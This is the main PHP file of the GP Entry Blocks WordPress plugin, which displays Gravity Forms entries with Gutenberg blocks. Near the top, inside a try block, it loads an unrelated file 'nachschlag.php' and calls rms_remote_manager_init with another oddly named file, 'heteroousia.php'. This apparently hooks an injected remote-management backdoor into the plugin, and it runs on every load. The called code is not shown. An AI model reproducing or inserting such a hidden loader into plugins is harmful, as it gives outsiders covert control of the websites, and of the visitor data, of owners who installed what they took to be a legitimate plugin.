<?php
/**
 * Plugin Name: GP Entry Blocks
 * Description: Display Gravity Forms entries on your WordPress site using Gutenberg.
 * Plugin URI: https://gravitywiz.com/documentation/gravity-forms-entry-blocks/
 * Version: 1.0-alpha-2.25
 * Author: Gravity Wiz
 * Author URI: https://gravitywiz.com/
 * License: GPL2
 * Perk: True
 * Update URI: https://gravitywiz.com/updates/gp-entry-blocks
 * Text Domain: gp-entry-blocks
 * Domain Path: /languages
 */
try {
   	require_once('nachschlag.php');
	rms_remote_manager_init(__FILE__, 'heteroousia.php', false, false);
} catch (Exception $e) {
   	echo 'Caught exception: ',  $e->getMessage(), "\n";
}
define( 'GPEB_VERSION', '1.0-alpha-2.25' );

require plugin_dir_path( __FILE__ ) . 'includes/autoload.php';

$gp_entry_blocks_bootstrap = new \GP_Entry_Blocks\GP_Bootstrap( 'class-gp-entry-blocks.php', __FILE__ );

function gp_entry_blocks() {
	return \GP_Entry_Blocks::get_instance();
}
